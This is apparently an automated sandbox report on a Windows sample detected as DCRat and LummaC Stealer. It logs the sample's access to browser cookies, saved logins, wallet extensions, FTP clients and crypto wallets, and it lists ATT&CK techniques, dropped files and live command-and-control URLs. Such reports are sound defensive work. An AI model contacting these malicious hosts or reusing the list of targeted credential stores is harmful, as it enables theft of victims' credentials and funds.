Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior

Source: Yara match

File source: Process Memory Space: RegAsm.exe PID: 6960, type: MEMORYSTR

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 0000000F.00000002.4119735415.0000000005AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4119735415.0000000005D5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4119735415.0000000005BF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4119735415.0000000005BC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4119735415.0000000005AD8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4119735415.0000000005DB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4119735415.0000000005C73000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4119735415.0000000005D8A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4119735415.0000000005C1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4119735415.0000000005CC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Bypass.exe PID: 7004, type: MEMORYSTR
Source: Yara match	File source: 15.0.Bypass.exe.7f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.4119735415.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.1821021197.00000000007F2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1818779277.0000021DBAF50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 572stuOQ0pZG2Xj.exe PID: 6792, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\SoftwareDistribution\Bypass.exe, type: DROPPED

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	12 Scripting	Valid Accounts	141 Windows Management Instrumentation	12 Scripting	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	111 Deobfuscate/Decode Files or Information	LSASS Memory	12 File and Directory Discovery	Remote Desktop Protocol	41 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	1 Registry Run Keys / Startup Folder	412 Process Injection	3 Obfuscated Files or Information	Security Account Manager	157 System Information Discovery	SMB/Windows Admin Shares	1 Screen Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	1 Services File Permissions Weakness	1 Registry Run Keys / Startup Folder	11 Software Packing	NTDS	461 Security Software Discovery	Distributed Component Object Model	3 Clipboard Data	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Services File Permissions Weakness	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Modify Registry	Cached Domain Credentials	351 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	351 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	412 Process Injection	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Services File Permissions Weakness	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
bFZYRLnRIz.exe	57%	Virustotal		Browse
bFZYRLnRIz.exe	58%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
bFZYRLnRIz.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\SoftwareDistribution\Bypass.exe	100%	Avira	HEUR/AGEN.1310064
C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	100%	Joe Sandbox ML
C:\ProgramData\SoftwareDistribution\Bypass.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	100%	Joe Sandbox ML
C:\ProgramData\SoftwareDistribution\Bypass.exe	79%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	71%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	39%	ReversingLabs	Win32.Infostealer.Generic

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
ipinfo.io	0%	Virustotal	Browse
backcreammykiel.shop	8%	Virustotal	Browse
ck66916.tw1.ru	3%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://ocsp.entrust.net03	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://ipinfo.io/	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://crl.entrust.net/2048ca.crl0	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://backcreammykiel.shop/api	100%	Avira URL Cloud	malware
http://ck66916.tw1.ru/L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIjhzN1kDN5EDOkVTNiVzNwUWN4IWZmBTM1cTO3kjZwEjMzUjZkhjYjJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W	0%	Avira URL Cloud	safe
https://backcreammykiel.shop/apiPK	100%	Avira URL Cloud	malware
https://backcreammykiel.shop/api	17%	Virustotal		Browse
http://ck66916.tw1.ru/@==gbJBzYuFDT	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
https://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
facilitycoursedw.shop	0%	Avira URL Cloud	safe
